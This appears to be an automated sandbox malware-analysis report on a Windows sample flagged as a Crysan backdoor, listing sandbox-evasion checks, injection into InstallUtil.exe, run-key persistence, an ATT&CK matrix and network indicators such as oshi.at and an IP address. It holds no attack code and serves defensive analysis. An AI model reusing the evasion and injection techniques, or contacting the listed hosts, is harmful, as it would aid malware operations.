                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: zXtG0a5Gt0.exe PID: 7912, type: MEMORYSTR
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeMemory allocated: 2500000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeMemory allocated: 4560000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeWindow / User API: threadDelayed 3259Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeWindow / User API: threadDelayed 6535Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 8004Thread sleep count: 3259 > 30Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 8004Thread sleep count: 6535 > 30Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -99859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -99750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -99640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -99531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -99394s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -99265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -99156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -99047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -98937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -98823s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -98701s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -98578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -98469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -98359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -98216s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -98093s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -97820s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -97703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -97492s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -97385s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -97265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -97156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -97047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -96937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -96828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -96718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -96609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -96500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -96390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -96281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -96172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -96062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -95953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -95844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -95734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -95625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -95515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -95406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -95297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -95187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -95059s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -94925s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -94781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -94597s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -94469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -94359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -94250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -94140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exe TID: 7976Thread sleep time: -94031s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 99859Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 99750Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 99640Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 99531Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 99394Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 99265Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 99156Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 99047Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 98937Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 98823Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 98701Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 98578Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 98469Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 98359Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 98216Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 98093Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 97820Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 97703Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 97492Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 97385Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 97265Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 97156Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 97047Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 96937Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 96828Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 96718Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 96609Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 96500Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 96390Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 96281Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 96172Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 96062Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 95953Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 95844Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 95734Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 95625Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 95515Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 95406Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 95297Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 95187Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 95059Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 94925Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 94781Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 94597Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 94469Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 94359Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 94250Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 94140Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeThread delayed: delay time: 94031Jump to behavior
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1354783384.0000000000792000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: CB5008Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeQueries volume information: C:\Users\user\Desktop\zXtG0a5Gt0.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: zXtG0a5Gt0.exe PID: 7912, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7632, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: zXtG0a5Gt0.exe PID: 7912, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7632, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts1
                Scheduled Task/Job
                1
                Scripting
                211
                Process Injection
                1
                Masquerading
                OS Credential Dumping211
                Security Software Discovery
                Remote Services11
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                Disable or Modify Tools
                LSASS Memory1
                Process Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Registry Run Keys / Startup Folder
                2
                Registry Run Keys / Startup Folder
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                DLL Side-Loading
                1
                DLL Side-Loading
                211
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture113
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets13
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Obfuscated Files or Information
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                zXtG0a5Gt0.exe62%VirustotalBrowse
                zXtG0a5Gt0.exe66%ReversingLabsByteCode-MSIL.Backdoor.Crysan
                zXtG0a5Gt0.exe100%AviraTR/Dldr.Agent.juage
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Ticks.exe100%AviraTR/Dldr.Agent.juage
                C:\Users\user\AppData\Roaming\Ticks.exe66%ReversingLabsByteCode-MSIL.Backdoor.Crysan
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://oshi.at/wacv0%Avira URL Cloudsafe
                https://oshi.at/wacvWMust0%Avira URL Cloudsafe
                147.124.212.2310%Avira URL Cloudsafe
                https://oshi.at0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                oshi.at
                194.15.112.248
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://oshi.at/wacvfalse
                  • Avira URL Cloud: safe
                  unknown
                  147.124.212.231true
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://github.com/mgravell/protobuf-netzXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpfalse
                    high
